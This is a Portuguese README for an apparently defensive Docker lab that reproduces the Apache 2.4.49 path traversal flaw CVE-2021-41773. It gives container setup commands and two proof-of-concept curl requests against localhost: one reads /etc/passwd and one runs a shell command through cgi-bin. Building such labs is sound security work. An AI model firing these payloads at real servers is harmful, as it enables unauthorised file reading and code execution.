
Laboratório vulnerável baseado em Docker para CVE-2021-41773 path traversal do Apache, fornecendo configurações de PoC para leitura de arquivos e execução remota de código em ambiente controlado.
Esta vulnerabilidade apenas se aplica à versão 2.4.49 que possui configurações específicas não padrão. Em certas situações, isso pode resultar em leitura de arquivos ou execução de código.
https://twitter.com/ptswarm/status/1445376079548624899
Os contêineres podem ser baixados diretamente do Docker Hub usando
docker pull blueteamsteve/cve-2021-41773:no-cgid
e executados usando
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Os logs do Apache podem ser visualizados usando o comando abaixo, ou basta remover o "-dit" do comando run acima para transmitir o stdio
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Os contêineres podem ser baixados diretamente do Docker Hub usando
docker pull blueteamsteve/cve-2021-41773:with-cgid
e executados usando
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Os logs do Apache podem ser visualizados usando o comando abaixo, ou basta remover o "-dit" do comando run acima para transmitir o stdio
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
Modifique e construa suas próprias versões usando o dockerfile e os arquivos de modelo httpd.conf nos subdiretórios